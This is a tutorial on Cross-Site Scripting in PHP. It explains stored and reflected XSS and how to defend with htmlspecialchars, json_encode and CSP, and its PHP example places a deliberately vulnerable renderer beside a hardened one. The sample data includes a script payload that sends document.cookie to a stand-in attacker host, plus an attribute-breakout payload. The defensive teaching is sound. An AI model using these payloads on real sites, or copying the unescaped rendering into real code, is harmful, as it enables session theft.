Cross Site Scripting (XSS) In PHP

Cross-Site Scripting (XSS) is one of the most common web application vulnerabilities. The attacker does not break into the server; instead, they abuse a flaw in a legitimate site that lets them inject a client-side script (almost always JavaScript) into a page the site serves. When a user visits that page, the browser downloads and executes the script under the site's own origin, so it runs with every privilege the site has granted that user.

In stored (persistent) XSS, the injected code is saved in the site's database, for example in a comment, profile field or forum post, and is delivered to every visitor who views that content. In reflected XSS, the payload travels in the request itself, typically a URL parameter that the server echoes back unescaped, and the victim has to be lured into opening a crafted link. In either case the resulting page can be defaced, and the script can read cookies or a session ID and send them to a site the attacker controls.

Because the injected JavaScript runs in the victim's browser with the site's origin, it can also redirect users to a spam or phishing site or, in a more sophisticated attack, act as a keylogger that forwards the user's keystrokes to an external server.

XSS is also used to take over user accounts and steal confidential information. It is frequently combined with Cross-Site Request Forgery (CSRF): the injected script makes the victim's browser send requests that the server cannot distinguish from the legitimate user's own actions, and because the script runs on the site's origin it can read and replay any anti-CSRF token the page holds.

The most effective defence is context-sensitive output encoding: every piece of untrusted data is escaped for the context in which it is inserted, at the moment it is written into the response. For HTML body text and quoted attribute values this means converting the characters that form HTML and JavaScript syntax, such as '<', '>', '&', '"' and the single quote, into HTML entities; in PHP, htmlspecialchars() with the ENT_QUOTES flag and an explicit charset does this. Data placed inside a <script> block needs JavaScript-specific encoding instead, for example json_encode() with the JSON_HEX_* flags. Encode on output rather than on input, so the stored data remains usable by other consumers, and send a Content-Security-Policy header as a second layer that limits what an injected script can do if one slips through.
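The following is an added example written for this article; it is not code from the original page. It puts the stored-XSS scenario described above next to the output-encoding fix: a comments table rendered once without any escaping and once with context-specific encoding, plus a CSP header as defence in depth. It assumes PHP 8.0 or later; the sample rows and the names $comments, e(), js(), render_vulnerable() and render_hardened() are illustrative and not part of any real project.

```php
<?php
// Added example for this article (not code from the original page).
// Assumes PHP 8.0+; the data and the names $comments, e(), js(),
// render_vulnerable() and render_hardened() are illustrative.
declare(strict_types=1);

// Defence in depth: send a CSP before any output so that even an injected
// <script> cannot load from or send data to attacker-controlled origins.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");

// Constructed sample rows, as they might come back from a comments table.
// The second and third rows are attacker-supplied payloads.
$comments = [
    ['author' => 'alice',
     'body'   => 'Nice post!'],
    ['author' => 'mallory',
     'body'   => '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'],
    ['author' => '" onmouseover="alert(document.cookie)',
     'body'   => 'breaks out of a quoted attribute'],
];

// VULNERABLE: stored data is interpolated straight into the HTML.
function render_vulnerable(array $comments): string
{
    $html = '';
    foreach ($comments as $c) {
        $html .= "<div class=\"comment\" data-author=\"{$c['author']}\">"
               . "<b>{$c['author']}</b>: {$c['body']}</div>\n";
    }
    return $html;
}

// Encoder for HTML text nodes and quoted attribute values.
// ENT_QUOTES also converts the single quote (before PHP 8.1 the default
// flags left it alone); ENT_SUBSTITUTE replaces invalid UTF-8 with U+FFFD
// instead of making htmlspecialchars() return an empty string.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Encoder for data embedded in a <script> block: emit a JSON literal whose
// <, >, &, ' and " are hex-escaped, so it can never contain "</script>".
function js(mixed $v): string
{
    return json_encode(
        $v,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// HARDENED: each untrusted value is encoded for the context it lands in.
function render_hardened(array $comments): string
{
    $html = '';
    foreach ($comments as $c) {
        $html .= '<div class="comment" data-author="' . e($c['author']) . '">'
               . '<b>' . e($c['author']) . '</b>: ' . e($c['body']) . "</div>\n";
    }
    // Hand the same data to client-side code as JSON rather than by
    // string concatenation into JavaScript source.
    $html .= '<script>var comments = ' . js($comments) . ";</script>\n";
    return $html;
}

echo "--- vulnerable output (payloads land as live markup) ---\n";
echo render_vulnerable($comments);
echo "--- hardened output (payloads become inert text) ---\n";
echo render_hardened($comments);
```

Run it with php on the command line and compare the two blocks of output: in the vulnerable version the <script> tag and the onmouseover attribute survive intact, while in the hardened version they appear as &lt;script&gt; and &quot; onmouseover=&quot;..., which the browser renders as text. htmlspecialchars() only covers HTML text and quoted attributes; unquoted attributes, URL attributes such as href (where a javascript: scheme is still a valid string), inline event handlers and CSS each need their own stricter handling, such as a scheme allowlist for URLs.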
